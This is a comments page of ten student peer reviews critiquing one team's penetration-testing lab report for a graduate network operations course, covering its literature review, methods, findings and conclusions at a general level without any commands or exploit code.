April 23, 2025

10 thoughts on “TECH 581 W Computer Network Operations: Laboratory 6, Team 4

  1. The abstract presented by team four explains what will be accomplished in the lab. It does not meet the requirements of length of the syllabus. Anything less than two paragraphs will be judged as poor scholarship. They explain how lab six will be the last “learning” lab. I disagree, performing a live penetration test in this setting is still a learning exercise and a capstone to the course. The literature review presented by team four, is nothing more than an APA cited list of reviewed articles. They have three extremely long paragraphs in their literature review with very few citations. This makes the literature review very hard to read and comprehend. Considering the entire literature review, team four does not present a review that is scholarly or academic. They do not show the overall state of the literature nor do they do an effective job of tying the literature reviewed into the lab report process. The length of the literature review however is impressive. The methods section that is presented by team four does explain the process they will follow to complete the lab. They do list steps that should have actually been in the findings section though. Team four decided to penetrate all of the Windows VMs that are part of our lab. Unlike the other teams they do not even attempt to show anything related to the Linux machine in the lab environment. Because teams two, three, and five at least paid some respect to the Linux machine this calls into question the results provided by team four. The methods section does a good job of explaining the how of what they will be performing, they fail to mention the when, what and why. These are very important parts of an academic and scholarly literature review. Team four explains that they used p0f and ettercap to fingerprint their machines, but they fail to mention how they generated the packets used to actually fingerprint the machines. This is questionable. In the findings section of the lab they first list their lack of overall experience. This is a mistake as that information should be in the issues section. The use of tools other than just metasploit was a very nice touch as most of the other teams just worked with metasploit. They explain that because most exploits target the higher layers of the OSI model organizations are concerned with only protecting their data at the higher layers. I have to disagree with that statement. Organizations are worried about the security of their information; the layers of the OSI model never come into the picture. The issues that team four list are very accurate and complete unlike the issues presented by teams one and three. They actually list the inability to exploit two of their systems as an issue. Of course they do list a lack of experience as one of their issues. I do not believe this should be the case. After performing enough research, and as we are reaching the end of this course there should not be any issues as far as experience goes. I agree with team fours conclusions.

  2. Group 4’s literature review, while quite lengthy, still doesn’t properly compare and contrast the literature to the lab activities. Each paper is given a paragraph that is, in most cases, a summary of the paper’s main ideas. The “Firewall Penetration Testing” paper was given a very extensive over view but only one reference was made to the current lab.

    The methodologies section starts out with the group’s assessment of the security level of the versions of Windows they were going to test. XP SP0 was an obvious easy target but Server 2003 was classified as less secure than XP SP3 with little reason given besides speculation as to the number of services that would be running on Server 2003. The operating system identification using passive reconnaissance tools was done with little detail using a tool called “pof.” A link wasn’t provided so more information couldn’t be researched but I suspect that the tool uses active reconnaissance to fingerprint the target OS. The group gave some details about their testing but missed some key details. Various exploits from Metasploit were tried but which ones? The group appears to have taken the same approach to each system which failed consistently. Sufficient research would have turned up a few sites with step by step instructions for compromising an XP SP0 machine using Metasploit. When attempting the server 2003 machine, the group attempted to exploit ports 21, 135, 137, and 445 though they don’t give any detail on how they attempted to exploit them.

    The findings section is a bit confusing. At first look, it appears to be a summary of the methodologies but while the methodologies make it sound like the XP SP0 machine was never compromised, the group says that they did compromise it using EXpwn. Also, the group mentions that they used Metasploit to exploit vulnerabilities in Server 2003 but none yielded any open sessions. If a session wasn’t opened, that means that the code injection didn’t work and the vulnerability wasn’t really, in fact, exploited. The group mentions that they researched the open ports on the Server 2003 virtual machine but doesn’t mention any of the specific vulnerabilities they discovered. The group mentions the issue of exploitation up the OSI stack and identifies that compromises of lower levels will exploit higher levels. One issue I had with this section of the findings is the proposed solution. The group suggests encryption at every layer. How would the system react to a compromise of the encryption at one of the layers? Encryption can only do so much and there must be trust between the layers that the lower layers have done their job. How would, for example, layer five understand that the IPSEC policy on layer three had been compromised? Layer five doesn’t “speak” IP or IPSEC, it trusts layer three to do that.

  3. I do not agree with the first few sentences of this team’s abstract. You do not need to get some help to attack a target. Also you do not need knowledge of tools and how they work. Someone can just get their hands on the tools and start randomly attacking systems. Knowledge is not needed at all. Break up the paragraphs. This way you would meet the required length of the abstract as per the requirements given to us. The literature review reads like a list. Compare and contrast the articles. Just don’t state your point, cite it, and state how it relates to the lab experiment. It is quite obvious that this lab report was written by multiple people. BREAK UP your paragraphs. Having one long paragraph makes it very difficult for the reading to continue reading and not lose interest. For having a lot of information from the articles, they is not many citations. These are needed especially when taking for the articles. No date for any article is NEVER an option. Use the Internet to find this information, your team is the only one that has no date for articles.
    The literature review is way too long. It is easily over the word count. Too much of the lab report is the literature review. Why does the team think that SP0 will be the easiest to compromise will the SP3 will be the hardest. I think that they could come up with that statement, especially when the team states that neither group member has done this before. Not many of the teams did not have the experience of penetration testing, but were still able to perform the lab experiment. The purpose of these labs is to teach the teams how to perform penetration testing. The team needed to go into more detail as to why they believe that exploiting the lower layers would make the next layer up more vulnerable. The lack of time should not be an issue. All teams had the same amount of time to perform the lab experiment, and they were able to get the lab experiment done. This team, like others, are disappointed that the exploits did not work for some of their environment. Failure is always an option. These labs should be teaching the teams how to perform penetration testing and how to protect systems properly.

  4. Team 4 began their lab report with an abstract introducing this lab assignment. They state that their objective for this lab is to use tools to determine the vulnerabilities of a target system, and then use tools to try to penetrate the target system.

    Team 4 begins their literature review section by discussing Mobile Test: a Tool Supporting Automatic Black Box Tests for Software on Mobile Devices. They related the layer design of Mobile Test to the layer design we have been using to classify vulnerabilities by the OSI model. This seemed to be an interesting comparison.

    They continue their literature review with Firewall Penetration Testing (Haeni, 1997). They discuss who should perform the testing. They state that testing should be done by “independent groups that could be trusted for integrity, experience, writhing skills and technical capabilities and not vendors or hackers”. Although I agree with this statement, they used the word “writhing” where I believe they meant to use the term “writing”. There were a few other misspellings throughout the document; however I used this as an example. They proceed with the types of testing and the steps involved in testing. They related these types of testing and steps involved to our current laboratory assignment.

    Next, team 4 discussed Ethical Hacking and Password Cracking: a Pattern for Individualized Security Exercises (Snyder, 2006). They discussed how passwords can be hashed by algorithms such as SHA-1. They also discussed password cracking programs such as John the Ripper. I believe that they did find a misstatement by the author of this article, “If the password is easily guessed, the password is secure..”. It would seem reasonable that if the password can be easily guessed, then it is not secure.

    Team 4 also reviewed A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test (Chen, Yang, Lan, 2007). They began this review by stating, “Penetration testing relies heavily on tools to accomplish its tasks, the more tools that are available the better the testers are for finding vulnerabilities.” I don’t necessarily agree with this statement. I believe that the knowledge of the tester is the key, not the number of tools that are available. I found it ironic that team 4 states that the article was designed to advertise a particular piece of software and that caution need to be taken on reading the article, however they state at the end that the author of the articles does not give the name of the software or where it can be obtained. This is either very poor marketing on the part of the author of the article, or the article was meant to document their work and not meant as an advertisement.

    In the methodology section, Team 4 discussed the methods that they used for conducting the testing and the results of the testing. They used pof and Ettercap to determine the operating system. They also used EZpwn, Fast Track, and various tools within the Metasploit framework to attempt to gain access, however had negative results. They then used Zenmap and Nessus to try to uncover any further vulnerabilities, but had negative results. In their results section they basically restate the methods and the results that they stated in the methods section.

  5. Team 4 did a nice job with their abstract in that it detailed what they intended to do in lab 6 and also tied this lab back to previous labs. Their literature review, however, read like a list and summary of the articles and didn’t compare and contrast the literature to the lab activities.
    The methods section starts out reiterating what they discussed in their abstract. After that they explain the process they will follow to complete the lab. However, some of this information should have been in their results section. The methods section does a good job of explaining how they plan to perform their testing. Team 4 gave some details about their testing but missed some key details. They used several exploits from Metasploit were tried but which ones? Team 4 failed consistently on many of their attempts but were honest enough to admit that this was due lack of experience. However, the purpose of these labs is to teach us how to perform penetration testing and how to protect systems properly. Hopefully team 4 will use this exercise as a learning experience and be able to apply it in the next lab exercise. Team 4 could have gone into more detail as to why they believe that exploiting the lower layers would make the next layer up more vulnerable.
    Team 4 had a great deal of issues. Many being just the time it took to install and use the selected tools. The lack of time should not be an issue. All teams had the same amount of time to perform the lab experiment, and they were able to get the lab experiment done. Team 4 like others, were disappointed that their exploits did not work for some of their environments, but that part of the learning process. Figure out what went wrong, make adjustments and try it again.

  6. The team starts with their abstract explaining what they are going to do in this week’s lab. The abstract also had a couple sentences that repeated what they had already said in the abstract. Next the team goes into the literature review. They again went into separate reviews for each article. The first article did not have any response to how it relates to the lab and any arguments for or against it. Again the second article just gives an overview of what was discussed within the article and no relation to the lab or any discussion about the article. The team continues the other articles in the same fashion. They then go onto the methodology section and explain what is going to occur in the hands on portion of the lab. When reading through the methodologies there were many items that belong in the results section of the lab. Examples would be when the team discusses how long it took for exploiting some of the vulnerabilities. This does not mean the team could not go into detail on what they were attempting to do but many times it felt as a methodology and results section where merged. The next section was the results section. It was almost as if the team members divided the methodologies and result sections and not collaborate and go over the sections to refine them. There was again repetition on gaining the same information that was talked about previously. This makes the lab hard to read and disorganized. The first paragraph of the results section would have made a good start for their conclusions rather than where it was placed. Next the team goes on to discuss the issues they had. Some of the issues they had were the time they had to learn to use the tools to exploit the system. What they did not put in this section that they talked about earlier in the lab was the experience they have with penetration testing. They could have included that within this section and taken it out of the others. They then go on to give there conclusion which went over what happened during the lab overall. They then discuss exploits via the use of “script kiddies” tools. Yes, some of these tools do make it seem simple to exploit a system but there are the tools that actually required knowledge of what the user is going to exploit before running the tool. When a script kiddies runs a tool they are not creating a plan before an attack and running tools to run the tools against any system. This should make the team rethink before using some of the terminology that can be thrown around. Yes there is no elite creation of tools within the environment but it also does not render just a point and click attack by most of the tools used. Also if some of the tools did not work that should have been put into the issues section and explained why they did not work. Was it because of the tool was coded wrong or inexperience with the tools? Overall they did what they needed for the lab, but the write up needs to be more organized.

  7. I found a few noteworthy things concerning team four’s lab write-up. The literature reviews was at the very least quite lengthy. I must admit I find this team’s commitment to results, demonstrated by the time spent on running exploits, to be admirable. Furthermore, I was intrigued by the fact that some local exploits were attempted: an interesting detail (although specifics were lacking; I assume that the ‘at’ system privilege escalation attack was employed). Finally, I agreed with the discussion on the OSI layer compromising, and appreciated the reference to encryption.

    It must be admitted that a fair number of problems are present with this teams report, many are somewhat trivial, but more than a few are serious. The literature review, despite its length, is flawed in style, formatting, and content. The review section was painful to read, due to ‘huge’ paragraph groupings. Furthermore, the use of the phrase “the author” became monotonous to the point of distraction. Continuing, despite the rather lengthy body of writing, almost nothing more than summary information was really presented. Finally, very few references were actually made: the massive paragraph on the first paper made no use of citation, other than to introduce the paper. This team should improve its literature review techniques in the future.

    Furthermore, I found it troubling that this team spent so much time in defeating the Windows XP SP0 host. Admittedly, it is worthwhile to experiment with tools, but this length of time appeared to proceed out of difficulty cracking the machine, and not necessarily thoroughness. I would ask: did this team read other teams’ prior lab exercises? I have found other teams’ research nearly as valuable as my own, as it becomes a body of knowledge upon which to draw when designing experimental setups. As it was well reported that certain specific exploits were known to work against XP SP0, the approach this team took of ‘throwing things out until one stuck’ seemed not only a waste of time, but under researched as well. I would suggest that a smart and efficient approach is the definition of professional: leveraging against both your own prior research and that of others in the field is necessary. I would recommend that team four should consider this in the implementation of future methods.

    It is also disturbing that this team asserts that they had no real experience with the penetration tools. I ask: what did you do for the last five lab exercises? Some of these prior exercises required testing of exploits; if you did not do these exploit tests, then it seems inappropriate to raise the issue of inexperience as it is self inflicted. Closely related to this, this team did not really use passive methods for the first two hosts, as it is apparent that a type of active scanning was performed which utilized repeated attempts of various exploits. Conceivably, the target will be alerted within the few attempts: this is a far cry from a quick and effective surgical strike based on effective passive reconnaissance. In this, I do not believe this team really fulfilled the goals of the laboratory exercise.

    Finally, I found that answers to the laboratory questions were quite brief. While a few good points were raised, no evidence or logic was presented to substantiate these claims. This team asserts that “organizations are more concentrated on securing the upper layers” rather than lower OSI layers. It is most likely a statement which requires explanation, as I am not convinced this is universally true. For instance, in the older UNIX paradigm, I feel there is much evidence to indicate that system administrators concern themselves mainly with the lower network layers rather than user applications. It appears that security policies may vary substantially based on the operating system deployed on the network clients.

  8. I think that group 4’s write-up for lab 6 was fair. The abstract for this lab was adequate and provided a short overview of the lab. The literary review was good and adequately reviewed the material. Group 2 answered all of the required questions for each reading. All of the citing for the literary review was done well and all of the pages were included. For this lab, the group answered all of the required questions and provided a good amount of detail the steps they used to attempt to exploit a system. One part that confused me read as follows: “The group also manually tried various exploits from Metasploit to try and gain access to the Windows XP SP0 operating system. This process took almost all of a day to accomplish.” Almost all of the Windows exploits should work on this system. I find it hard to believe that this task should take longer than 20 minutes, including researching how to use Metasploit and researching an applicable exploit. Also, the group did not explain the passive OS findings well. The indicated that Server 2003 came up as Server 2000 SP4, which is not the same OS at all. What would happen if one were to attack a system using an exploit for one OS when it’s really another? Could this raise awareness and potentially ruin all of the passive scanning done? Finally, the conclusion was adequate and summarizes what was covered.

  9. The team starts out with a strong abstract and provides a well written literature review. The team used a combination of tools such as Ezpwn, FastTrack, Ettercap and p0f to attempt to exploit there selected target machines. It seems as if the team had difficulty attempting to identify the specific operating system using certain tools. Often reading the manual that is available in backtrack can help, type man “name of tool” in a shell. It also seems as if Ettercap gave false reading for most of your tests which is similar to other groups’ findings. Was Metasploit Framework updated before the tests were done or did this happen during the test? It seemed it was updated while testing the Windows XP Sp3 machine. Similar to other groups the Windows XP Sp3 system was difficult to exploit, mainly because this machine is up to date with patches. The Windows XP Sp0 seemed to be the easier of the system to exploit, when comparing the result to the other teams. It seems like all teams picked XP Sp0, mainly because there are known exploits for this system which is the reason for service pack releases.

  10. Team four’s offering is generally improved over previous weeks but still could use some work.

    The abstract vaguely describes the experiment. Are premade tools the only means for penetration testing? Is lab seven really about the gaining access to the system, or is there more to it? If the pedagogy calls for the labs to build on each other, do you really need to mention it in the abstract?

    The literature review gives exhaustive summaries of the articles that make the report painful to read. While the team makes an attempt to relate the articles back to the labs, it is cursory at best. Little if any evaluative content suggests a lack of comprehension, effort, or both.

    The group’s methods section contains a good amount of detail, but more specifics would make it easier to repeat. If the literature review is a mandatory section of the assignment, does it need to be mentioned in the methods section? There is data in this section that belongs in findings. Why did it take all day to crack XP SP0? What finally worked? Why didn’t it work with Service pack 3? Why did you attempt random ports with Server 2003? Did you attempt to fingerprint any of the systems first? Why do you think you didn’t succeed?

    In your results section, you state that the team has a lack of penetration testing experience. This belongs in the issues section, but do you feel the other groups have an unfair advantage? Your findings give me an accurate picture of what the group was able to achieve, though there is information that really belongs in the methods section. The tools operate the upper layers but is that where they actually attack?

    In the group’s issues section you state that a lot of time was eaten up by learning the tools. Shouldn’t you have been doing this all along? You claim a lack of knowledge as a hindrance. This is a graduate level class. You must be adaptable and learn to cover gaps in knowledge on the fly.

    The group’s conclusion summarizes the methods, and states that they learned the ways of trial and error. Will the same tools that worked here always work? What about the tools that failed? Is there anything special about this environment that might have affected the outcome?

Comments are closed.